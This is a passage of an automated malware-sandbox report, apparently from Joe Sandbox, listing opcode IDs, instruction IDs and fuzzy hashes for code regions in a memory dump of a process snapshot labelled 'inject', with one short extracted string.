                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 191004c423594c789fdc5b15f7f76b136fe45de0b4d8ec649e4c0d5ad734e5a8
                • Instruction ID: 3203cc87dae077fac87f4921baf684373a483775f4e17c1acc743473545df4ca
                • Opcode Fuzzy Hash: 191004c423594c789fdc5b15f7f76b136fe45de0b4d8ec649e4c0d5ad734e5a8
                • Instruction Fuzzy Hash: 1AC117B0A2CE5D8FDB98EF3CC49466877D1FB59754B5445B8E18EC32E6CE34A8418B80
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8c26e5e9500890921ea6bde493f08be1fe96a3f68bbba9d72dfac41fa308fd13
                • Instruction ID: ad5df702bf1c11de8d6dcca774d324a0d9666742a8345124caf6ee00ab105984
                • Opcode Fuzzy Hash: 8c26e5e9500890921ea6bde493f08be1fe96a3f68bbba9d72dfac41fa308fd13
                • Instruction Fuzzy Hash: 44B17BA1A2CA494FEB99FB3CC4652B877D1EF8A614F5441BED18EC32D7DD2858038781
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4435140d44beb205f81d599bc9d4086f0620909a26d515a55b5ae1ee2bb333cf
                • Instruction ID: be29c23ce8f6f70e45c741ac5b3e339d3a7f0d9eee91f5f2ca1ea99a474ed09a
                • Opcode Fuzzy Hash: 4435140d44beb205f81d599bc9d4086f0620909a26d515a55b5ae1ee2bb333cf
                • Instruction Fuzzy Hash: C7B1DAA072D9058FEB49BB7CC869379B2D6EF9A700F5001B9D44DC32E7DD286C428762
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 414e0ed2dce0d8ccf443e5b4dbbf65121aa5f102cf30aa67a78c50b95e45e779
                • Instruction ID: 11898c3514cb268fa4ca988bfa158e103f0b134cee9a0b25e71c55add738716b
                • Opcode Fuzzy Hash: 414e0ed2dce0d8ccf443e5b4dbbf65121aa5f102cf30aa67a78c50b95e45e779
                • Instruction Fuzzy Hash: 48B1D57051CA8D8FEB69EF38D8557E93BD1EF55310F14826EE88DC7292CA349845CB82
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 62ec237bf17a5de39dd9e8852f1e88e9f6735fd731c2269197638d58636d6aeb
                • Instruction ID: 701a54323e569e9e1a349455724de9294a15da367183b5d633a3919af3fe8790
                • Opcode Fuzzy Hash: 62ec237bf17a5de39dd9e8852f1e88e9f6735fd731c2269197638d58636d6aeb
                • Instruction Fuzzy Hash: A9A1E6B0A2D91A4FEB59FF38C8456BC77E1EF48304F4441B9D54DC32E2DE29A8428B51
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3c533ae65af4cb6d0fc262fe0e1becdda0d162c43510cb89664268919b12d838
                • Instruction ID: ac7717d686d0eb5b3257587d0700049ad3e9fcd0916951f1e33d9313c8f63c1c
                • Opcode Fuzzy Hash: 3c533ae65af4cb6d0fc262fe0e1becdda0d162c43510cb89664268919b12d838
                • Instruction Fuzzy Hash: 74A181B1A2D91A4FEB9AFF38C4597BD73D1EB58304F40447AD90EC32A2DD286C418780
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1fd38609d7028fedf3de16b9f3e03c16bce27242027fe9609693ea45a4500c36
                • Instruction ID: b9b7384c828ca739be91d9f3ac5a8dad5f8c78a6f369dccf9c6633f8f170cbbc
                • Opcode Fuzzy Hash: 1fd38609d7028fedf3de16b9f3e03c16bce27242027fe9609693ea45a4500c36
                • Instruction Fuzzy Hash: C29190A0A2D95A4FEB9AFF38C4557B977E1EF58304F40447AD94DC32E2DE28AC418781
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ea28228b7f940399d78aea7982af67624a0430d1b131085b97a466980e42f059
                • Instruction ID: 9a527979b0b9edc3cf7537ad5e4244ee4e0196c3d5a6ef62dae6060735565713
                • Opcode Fuzzy Hash: ea28228b7f940399d78aea7982af67624a0430d1b131085b97a466980e42f059
                • Instruction Fuzzy Hash: 3D810671A2C9595FDB59EF38C8596F977E1EF99310F0441BAE14EC32E2CD286C428B81
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 56480fe658f7428624670fe0122026aef47d02a0e3984e5f1dd1520e788f5eea
                • Instruction ID: 1ccb8757efe555387f7d604c23bd158d54f0ef8601d440f0c505014209736b8f
                • Opcode Fuzzy Hash: 56480fe658f7428624670fe0122026aef47d02a0e3984e5f1dd1520e788f5eea
                • Instruction Fuzzy Hash: 7C6136B1A2DA0B4FE799BF7CD81A2BD77D1EF89211F4440BAD58DC3292DD286C424780
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 422c84b0e444c54679a3cedfb112247b804cfa675630de408a1abd859d2321f8
                • Instruction ID: c748c665bde817cce8268f2094e1d474c75e4e80476307d1197879c6a3762005
                • Opcode Fuzzy Hash: 422c84b0e444c54679a3cedfb112247b804cfa675630de408a1abd859d2321f8
                • Instruction Fuzzy Hash: 596158B080D6898FD749EF78C8556B87BF0EF66314F0482BFD148C71A2DB28A846CB51
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 74df9ba2c91508e6534ec399fa345bf8f49bef88c7c485ddbec137f0a42bc93d
                • Instruction ID: fc2a7c653547dd6ca7473d975b380847874f303d06a5bfc3f95cc3e3c6422cdc
                • Opcode Fuzzy Hash: 74df9ba2c91508e6534ec399fa345bf8f49bef88c7c485ddbec137f0a42bc93d
                • Instruction Fuzzy Hash: 1E517170918A0D8FDB58EF68D8457EDBBF1FF99310F1082AAD44DD3252DA34A8428F81
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4af114f5698af46f10dc5296110eb3c8af07472a255c2a238136ecbb5ba07e4c
                • Instruction ID: 37ad8132153e89131c6229f37f1fdccde237c70a9091f20264b7ad484a159c5e
                • Opcode Fuzzy Hash: 4af114f5698af46f10dc5296110eb3c8af07472a255c2a238136ecbb5ba07e4c
                • Instruction Fuzzy Hash: 466190B0A2D91A5FEB95FF38D4456BC77E1EF98304F4041BAE64DC32E2DE2868418B40
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 23b064749be207ffb6d92897fd1ad356aca566dc1cb1a6018cff396ad9de7b01
                • Instruction ID: a937fb2b0672b86178dac2866b6820624c01e75047c5e6e34403f6bc89b9a959
                • Opcode Fuzzy Hash: 23b064749be207ffb6d92897fd1ad356aca566dc1cb1a6018cff396ad9de7b01
                • Instruction Fuzzy Hash: FA610770D1D6864FEB4AAB7484112A9BBE1EF17314F1842E9D199C71E3CD6CA843CB91
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c0919835d12b565779f3c63b25f2827d1b19055d64f7153a2012a96a18494edc
                • Instruction ID: eb2a7cbd02d4d86a5cf18cf014f87bf18e903dd4a593fab80436233bd334d3c0
                • Opcode Fuzzy Hash: c0919835d12b565779f3c63b25f2827d1b19055d64f7153a2012a96a18494edc
                • Instruction Fuzzy Hash: F051B371A2891C9FDB99FF38C459ABDB7E1EF98350F444579E14ED32A2CE24AC418B40
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c7d72e2de6675543813e78cc28f36918a6804809d47078909520fc0ce2f6c64a
                • Instruction ID: 6a637208057fcd8a183a05b6ff5286219a86b0df463e62d1fce1b4839b74a6e6
                • Opcode Fuzzy Hash: c7d72e2de6675543813e78cc28f36918a6804809d47078909520fc0ce2f6c64a
                • Instruction Fuzzy Hash: 3651A370918A1C8FDB59EF68D845BE9BBF1FB59310F0082ABD44DD3252DE34A9858F81
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 26eead4cb61f9c2007e7d85367825f1bb54b7aa9fb0ddec7c86d100b8ffc27dd
                • Instruction ID: c00759565e9aaa258e453fbd68b1941f42167ad41440bef2fed1566d42be8427
                • Opcode Fuzzy Hash: 26eead4cb61f9c2007e7d85367825f1bb54b7aa9fb0ddec7c86d100b8ffc27dd
                • Instruction Fuzzy Hash: 67210892A2DB9A5FEB42BB7C98151E87FA0EF62254B0841F7D688C7093D914584583D2
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4c692cdeaaf2d5384ee0e93d83e4cb631a3100c9fb885856ab2e5b67413e97af
                • Instruction ID: 9d30b228a66da3c30d483405ae5b7086862d40b5cbc25ef7069347a6dee2da83
                • Opcode Fuzzy Hash: 4c692cdeaaf2d5384ee0e93d83e4cb631a3100c9fb885856ab2e5b67413e97af
                • Instruction Fuzzy Hash: DA5109B0A2D94A4FEB56EF38D8556BC77E2FF95304F0440BAD549C32E2DE286C418B41
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 05d67b6cb6086ea75cd21c5f1ee719b79df5a71f66ab33f5fb10eb60fd56da31
                • Instruction ID: ede1f4435013d08420aceafd80c3a113d07f4e03c71c0d836b01a3944047126d
                • Opcode Fuzzy Hash: 05d67b6cb6086ea75cd21c5f1ee719b79df5a71f66ab33f5fb10eb60fd56da31
                • Instruction Fuzzy Hash: B651A2B090DA0D8FDF98EF28D465AA977E0FF55311F10416ED14AC36A1CB75D882CB81
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7dc56a9f89fb046b3f065c1bd05de02b1068828dcea003953f2e3e2ec761aa4e
                • Instruction ID: 6838bf762ea795cefded4c2c720457685b8776f9132b8e370d2a3309d73dd164
                • Opcode Fuzzy Hash: 7dc56a9f89fb046b3f065c1bd05de02b1068828dcea003953f2e3e2ec761aa4e
                • Instruction Fuzzy Hash: 9E410961A1DB9A0FE797BB7C941927977D2DFC6214B4840FBD98DC3293DC18AC428351
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: eefcb5b45acc1d21a2d661b263da40d4ac50862113abcd1a71dfd1067d67d092
                • Instruction ID: 5310305d3334f6cb9d29d58204571b1530afb2a26dd06bbe08204f61b9394b33
                • Opcode Fuzzy Hash: eefcb5b45acc1d21a2d661b263da40d4ac50862113abcd1a71dfd1067d67d092
                • Instruction Fuzzy Hash: 9C41C2B1A18A094FDB85EF78C4596FCB7F2EF99310B0441BAD549D32A2EF389C418B51
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9cdc4d882992065281e1b763ca896e34dad1a786908f6ba7f83081d2d5416cd3
                • Instruction ID: 44be39db50d5d3eb9634ab69dc1f2ecf9d2552e0794cad0a2c776a7b86fca9da
                • Opcode Fuzzy Hash: 9cdc4d882992065281e1b763ca896e34dad1a786908f6ba7f83081d2d5416cd3
                • Instruction Fuzzy Hash: C931C4B0A19A4A8FDB49FFB8C8696FD77A1FF89700F544479D509D32C6CE3868428B50
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2da4a2fb27ee70e5ea616391730cc4850a3f3f6ca99c50cd5b6711d1c6e5d0a6
                • Instruction ID: b846bb3804f14065441010cd497f4ed9ecbad7942fde6868569ea095b7145111
                • Opcode Fuzzy Hash: 2da4a2fb27ee70e5ea616391730cc4850a3f3f6ca99c50cd5b6711d1c6e5d0a6
                • Instruction Fuzzy Hash: 8F319F60B1DA494FE789FF3CD45A378B2C2EB98301F1405BEA44EC3293DD689C418741
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: eeafb07e1430593da40ce49c336034b9a74409541a6f6eaf4e8f10f84d50aa76
                • Instruction ID: 83ee239d33b860ee674bbd841a1993f6e8340622699b5897d0ffba921d27ca4b
                • Opcode Fuzzy Hash: eeafb07e1430593da40ce49c336034b9a74409541a6f6eaf4e8f10f84d50aa76
                • Instruction Fuzzy Hash: 8D31047055CA9A8FDB4AFF38C4915A83BF0FF16314B4401EAD049C72E2CE38A881CB41
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5007947a8ddcc296f76f4cb9b2f1325dff1a83bdf793f47310624df5c15100c5
                • Instruction ID: a91b80aa4df82c740199f216ace72cf8474a273ab9d81b94d86cead13635ee95
                • Opcode Fuzzy Hash: 5007947a8ddcc296f76f4cb9b2f1325dff1a83bdf793f47310624df5c15100c5
                • Instruction Fuzzy Hash: 7E21E791A2CB464FF7457BB8885D3B87BD2EF95B04F0441BAE44DC32D3DD2899018B52
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 30f67d05ee0f40f5531410b0d37834a7afb402b83c31cf4829071c1d8ed3a2cf
                • Instruction ID: 6d9ac22bac1c99d713c4288c9615918f42c25d17d1d98c53966e77c691efad91
                • Opcode Fuzzy Hash: 30f67d05ee0f40f5531410b0d37834a7afb402b83c31cf4829071c1d8ed3a2cf
                • Instruction Fuzzy Hash: DA0126B2D19A4D0FDB46EFB8881A1EE7BF1FF14201F4001B7D548C7192DE2899008781
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bd56b6261f2890658668ae131c8107a061958990fac26464c4461cd05004dd8c
                • Instruction ID: 27ddddd5f3b2917c86a35cfe7e551885fb8520e364a0e2ca0401c0e4ade57dee
                • Opcode Fuzzy Hash: bd56b6261f2890658668ae131c8107a061958990fac26464c4461cd05004dd8c
                • Instruction Fuzzy Hash: 8AF090A189E3C90FD7035BB54C355A17FB4AF53204B4D42DBE5C88B0A3C61866288762
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ba8a2e2465990daceb848e9e8dbcbc7c536a262af9048d350db8c23ed1841e70
                • Instruction ID: 87304ff4e71bd5ba2a3fa89bededc2cd04391deacbab3e99b5a8e88f1f88b489
                • Opcode Fuzzy Hash: ba8a2e2465990daceb848e9e8dbcbc7c536a262af9048d350db8c23ed1841e70
                • Instruction Fuzzy Hash: 4F01769491C7C40FE742BE3CA8620317FE09F82604B0844AAE6C8C70E3EC18A9518782
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7e01a3972c7a2abbda8299bf1a8f75d2198aeb8791b5e9de9327cb69c6d7d8b1
                • Instruction ID: cc819da8eb9ca124d1c6f5ebb232fb9ebe20abffddc6303a75b9bed5ae0ccfba
                • Opcode Fuzzy Hash: 7e01a3972c7a2abbda8299bf1a8f75d2198aeb8791b5e9de9327cb69c6d7d8b1
                • Instruction Fuzzy Hash: 80F026C1D1D3920BF7957B78C4672B829C19F40304F5480B9D38DC32E3CE5CA8618741
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5d8128fd44e03241efc72cab356413a01651c9aac48d8ae541e3bbc2b5f63ff5
                • Instruction ID: 9a615f1ae251d566333fcaed23931160b8d879c9976240b7eff10dba28f1786c
                • Opcode Fuzzy Hash: 5d8128fd44e03241efc72cab356413a01651c9aac48d8ae541e3bbc2b5f63ff5
                • Instruction Fuzzy Hash: 4801DCA446F3C96FCB53AB348820892BFB0AF03229B0845EBE1D88B0A3D5081118CB42
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2389e4b16049f60eeae2007f4a1936719a62666418d6f458ef2fe61c5f63548a
                • Instruction ID: 89ff76eb71948b31250cd567d1edec54d6ec7a8174e445e29ad8dee3631ab712
                • Opcode Fuzzy Hash: 2389e4b16049f60eeae2007f4a1936719a62666418d6f458ef2fe61c5f63548a
                • Instruction Fuzzy Hash: AFE06D61B189198FAF81BBBCD4492FCB2D2EBCC211B100177DA0DD3292DE2858418790
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c9d3b21ea2d8f0e320682bb5725fac58beed70bb8e6a711c783d50f84cd7614c
                • Instruction ID: a900d23b00d5a26f9ae17b865603e9bb65faaefe64275b6073a5db231d8c85f2
                • Opcode Fuzzy Hash: c9d3b21ea2d8f0e320682bb5725fac58beed70bb8e6a711c783d50f84cd7614c
                • Instruction Fuzzy Hash: 89E0723695CA8C4BCB00BEA9EC204C6BBA1FBC9308F0101AAE59CC7291D2628625C385
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3470239d6c2e1d1d8db50046371296d7767ad04450776460d0497494a382e657
                • Instruction ID: b1badb56f68cc32f9eb4f96fb88d93f163bf1e6695e55715447be8449067ee70
                • Opcode Fuzzy Hash: 3470239d6c2e1d1d8db50046371296d7767ad04450776460d0497494a382e657
                • Instruction Fuzzy Hash: 82E08CB185E6CD0EDB12AB3889220D8BF60FE52200F8901E7E698C70A3E95941298782
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID: O_^$O_^$O_^$O_^
                • API String ID: 0-138518006
                • Opcode ID: 158b28ecd627ccaa288578582487f98d98a498ed58ccd619bbec4f50ff4ded2a
                • Instruction ID: cdcb8150e69b0a0252269ae29acdd3d1dbe004359dbcf9e62ff1e12b7b2c9340
                • Opcode Fuzzy Hash: 158b28ecd627ccaa288578582487f98d98a498ed58ccd619bbec4f50ff4ded2a
                • Instruction Fuzzy Hash: AD313AE7C0E7C55FE352ABBC9DE91E83F90EF5216D71840F6C2C98E1A3F804544A8A51